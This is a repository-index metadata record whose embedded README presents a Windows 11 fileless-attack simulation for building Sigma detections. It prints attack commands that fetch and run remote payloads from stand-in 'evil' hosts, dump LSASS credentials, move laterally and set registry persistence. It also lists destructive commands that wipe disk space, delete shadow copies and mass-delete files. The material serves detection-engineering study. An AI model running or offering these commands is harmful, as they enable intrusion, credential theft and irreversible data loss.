{"id":29095718,"url":"https://github.com/P1rat3L00t/Blu3F1R3","last_synced_at":"2025-06-28T11:06:56.835Z","repository":{"id":299938354,"uuid":"1004648000","full_name":"P1rat3L00t/BLU3F1R3","owner":"P1rat3L00t","description":"Fileless PoC malware for educational \u0026 security research purposes.","archived":false,"fork":false,"pushed_at":"2025-06-21T20:29:54.000Z","size":576,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-06-21T20:33:19.994Z","etag":null,"topics":["anydesk","blue-team","bsod","fileless-malware","living-off-the-land","log-analysis","lolbins","loldrivers","mitre-attack","purple-team","ransom-note","red-teaming","reflective-dll","registry-keys","threat-detection","windows-11"],"latest_commit_sha":null,"homepage":"https://lolol.farm/","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/P1rat3L00t.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-06-19T00:58:45.000Z","updated_at":"2025-06-21T20:29:57.000Z","dependencies_parsed_at":"2025-06-21T20:44:02.591Z","dependency_job_id":null,"html_url":"https://github.com/P1rat3L00t/BLU3F1R3","commit_stats":null,"previous_names":["mrf0xtut/yamata-no-orochic2","p1rat3l00t/blu3f1r3"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/P1rat3L00t/BLU3F1R3","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P1rat3L00t%2FBLU3F1R3","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P1rat3L00t%2FBLU3F1R3/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P1rat3L00t%2FBLU3F1R3/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P1rat3L00t%2FBLU3F1R3/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/P1rat3L00t","download_url":"https://codeload.github.com/P1rat3L00t/BLU3F1R3/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/P1rat3L00t%2FBLU3F1R3/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":262419809,"owners_count":23308100,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["anydesk","blue-team","bsod","fileless-malware","living-off-the-land","log-analysis","lolbins","loldrivers","mitre-attack","purple-team","ransom-note","red-teaming","reflective-dll","registry-keys","threat-detection","windows-11"],"created_at":"2025-06-28T11:06:55.376Z","updated_at":"2025-06-28T11:06:56.818Z","avatar_url":"https://github.com/P1rat3L00t.png","language":"C++","funding_links":[],"categories":[],"sub_categories":[],"readme":"\n# Windows 11 Threat Detection \u0026 Threat Intel via Sigma + MITRE ATT\u0026CK + LOLBins\n\n\u003e **Warning**  \n\u003e This project is for **educational, authorized research, and blue team simulation in isolated lab environments only**.  \n\u003e **Do not test on production or unauthorized systems.  \n\u003e The authors are NOT responsible for misuse.**\n\n---\n\n![Threat Detection](https://github.com/user-attachments/assets/0360c1d6-32c1-416b-a93a-a02822d7a536)\n\n---\n\n## Table of Contents\n\n- [About](#about)\n- [Technical Overview](#technical-overview)\n- [Attack Chain Example (PowerShell)](#attack-chain-example-powershell)\n- [Reconnaissance and LOLBins](#reconnaissance-and-lolbins)\n- [Advanced Techniques](#advanced-techniques)\n- [MITRE ATT\u0026CK + Sigma Mapping](#mitre-attck--sigma-mapping)\n- [Destructive LOLBin Payloads](#destructive-lolbin-payloads)\n- [Log-Based Detection Engineering](#log-based-detection-engineering)\n- [Legal Disclaimer](#legal-disclaimer)\n- [References \u0026 Further Reading](#references--further-reading)\n\n---\n\n## About\n\nThis lab-oriented simulation demonstrates fileless attack chains using LOLBins and post-exploitation techniques on **Windows 11**. It is built to aid:\n\n- Blue teamers in building custom **Sigma detection rules**.\n- Threat hunters studying MITRE ATT\u0026CK tactics mapped to native Windows activity.\n- Log analysts working with **Sysmon, Event Viewer, and EVTX files**.\n\n---\n\n## Technical Overview\n\nThe project mimics advanced attacker behavior using trusted Windows binaries and in-memory payload delivery. Coverage includes:\n\n- **Initial Access \u0026 Execution:** Abuse of `rundll32`, `regsvr32`, `certutil`, etc.\n- **Privilege Escalation:** Print Spooler CVEs, HiveNightmare, SeriousSAM.\n- **Credential Access:** LSASS dump, SAM parsing.\n- **Lateral Movement:** `wmic`, `PowerShell` remoting.\n- **Destruction/Impact:** Payload encryption or wipe using only built-in tools.\n\nThese stages are aligned with **MITRE ATT\u0026CK** and tailored for **log analysis via Sigma rules and Sysmon events**.\n\n---\n\n## Attack Chain Example (PowerShell)\n\nA practical simulation using LOLBins and stealthy PowerShell:\n\n```powershell\n# Initial Access\nIEX(New-Object Net.WebClient).DownloadString(\"http://malicious.com/dropper.ps1\")\n\n# Reflective DLL Injection\nrundll32.exe \\\\192.168.X.X\\share\\payload.dll,ReflectEntry\n\n# Privilege Escalation\nStart-Process powershell -Args \"-ExecutionPolicy Bypass -File C:\\Temp\\elevate.ps1\" -Verb RunAs\n\n# Credential Dumping\nrundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\\Temp\\lsass.dmp full\n\n# Lateral Movement\nwmic /node:targetPC process call create \"powershell.exe -File \\\\share\\payload.ps1\"\n\n# Persistence via Registry\nSet-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"Persistence\" -Value \"powershell -File C:\\Temp\\persist.ps1\"\n````\n\n---\n\n## Reconnaissance and LOLBins\n\n### LOLBins (Living Off the Land Binaries)\n\nThese built-in binaries are abused for fileless execution:\n\n```cmd\nregsvr32 /s /n /u /i:http://evil/payload.sct scrobj.dll\ncertutil -urlcache -split -f http://evil/payload.b64 drop.exe\nrundll32.exe \\\\192.168.X.X\\share\\payload.dll,ReflectEntry\n```\n\nUse Sigma to flag any suspicious use of these:\n\n```yaml\ndetection:\n  selection:\n    Image|endswith: '\\rundll32.exe'\n    CommandLine|contains: '\\\\'\n  condition: selection\n```\n\n---\n\n## Advanced Techniques\n\n### Fileless Embedding via Native Tools\n\n```cmd\ncopy /b clean.jpg + malware.7z clean.jpg\ncertutil -decode clean.jpg payload.7z\n7z x payload.7z -oC:\\Temp\\\n```\n\n### Reflective DLL Execution (In-Memory)\n\n```cmd\nrundll32.exe \\\\evilhost\\malicious.dll,ReflectEntry\n```\n\nTrack these behaviors via **Sysmon Event ID 1 + ID 7** and use Sigma rules to flag remote `.dll` execution or abnormal image loads.\n\n---\n\n## MITRE ATT\\\u0026CK + Sigma Mapping\n\n| Tactic               | Technique                     | ATT\\\u0026CK ID       | Sigma Detection Focus                        |\n| -------------------- | ----------------------------- | ---------------- | -------------------------------------------- |\n| Initial Access       | Malicious Office/Payload Drop | T1203            | Office macros, outbound HTTP from MS Office  |\n| Execution            | LOLBins \u0026 Scripting           | T1218, T1059     | regsvr32, rundll32, powershell, certutil     |\n| Privilege Escalation | Print Spooler, Hive ACL       | T1068, T1003.002 | Spoolsv.exe anomalies, SAM/LSASS file access |\n| Credential Access    | LSASS Dump, SAM Access        | T1003            | Access to lsass, use of comsvcs.dll          |\n| Lateral Movement     | Remote Service Execution      | T1021.002        | wmic, psexec, and abnormal remote processes  |\n| Impact               | File Encryption, VSS Deletion | T1486, T1490     | vssadmin, cipher.exe, shadow copy deletion   |\n\n---\n\n## Destructive LOLBin Payloads\n\nUsed in impact or ransomware simulation phases:\n\n```cmd\ncipher /w:C:\\\nvssadmin delete shadows /all /quiet\nbcdedit /set {default} recoveryenabled No\nforfiles /p C:\\ /s /d -2 /c \"cmd /c del /q @file\"\n```\n\nSigma Detection Example:\n\n```yaml\ndetection:\n  selection:\n    CommandLine|contains: 'cipher /w'\n  condition: selection\n```\n\n---\n\n## Log-Based Detection Engineering\n\n### Recommended Setup\n\n* **Sysmon Configuration:** Use [SwiftOnSecurity's sysmon config](https://github.com/SwiftOnSecurity/sysmon-config)\n* **Log Sources:**\n\n  * Microsoft-Windows-Sysmon/Operational\n  * Security.evtx\n  * Windows PowerShell logs\n  * WMI Activity logs\n\n### Tools\n\n* **Sigma:** Convert to Splunk/ELK with `sigmac`.\n* **EvtxECmd or Chainsaw:** Parse `.evtx` offline for hunting.\n* **RedCanary’s Atomic Red Team:** For validation testing.\n\n### Key Sigma Triggers\n\n| Event | Trigger Description                        |\n| ----- | ------------------------------------------ |\n| 1     | Process creation (e.g. rundll32, certutil) |\n| 7     | Image loaded (non-Microsoft DLLs)          |\n| 11    | File creation (e.g. lsass.dmp, .7z)        |\n| 13    | Registry key modification for persistence  |\n\n---\n\n## Legal Disclaimer\n\n\u003e All tools, code, and techniques are shared purely for authorized learning and research.\n\u003e Use only in test environments and always adhere to ethical and legal standards.\n\u003e The authors **take no responsibility** for misuse.\n\n---\n\n## References \u0026 Further Reading\n\n* [Sigma HQ](https://github.com/SigmaHQ/sigma)\n* [LOLBas Project](https://lolbas-project.github.io/)\n* [Sysmon](https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon)\n* [MITRE ATT\\\u0026CK](https://attack.mitre.org/)\n* [Chainsaw - Rapid Log Analysis](https://github.com/countercept/chainsaw)\n* [EvtxECmd](https://ericzimmerman.github.io/)\n* [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team)\n* [Print Spooler Exploits](https://itm4n.github.io/printnightmare-not-over/)\n\n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FP1rat3L00t%2FBlu3F1R3","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FP1rat3L00t%2FBlu3F1R3","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FP1rat3L00t%2FBlu3F1R3/lists"}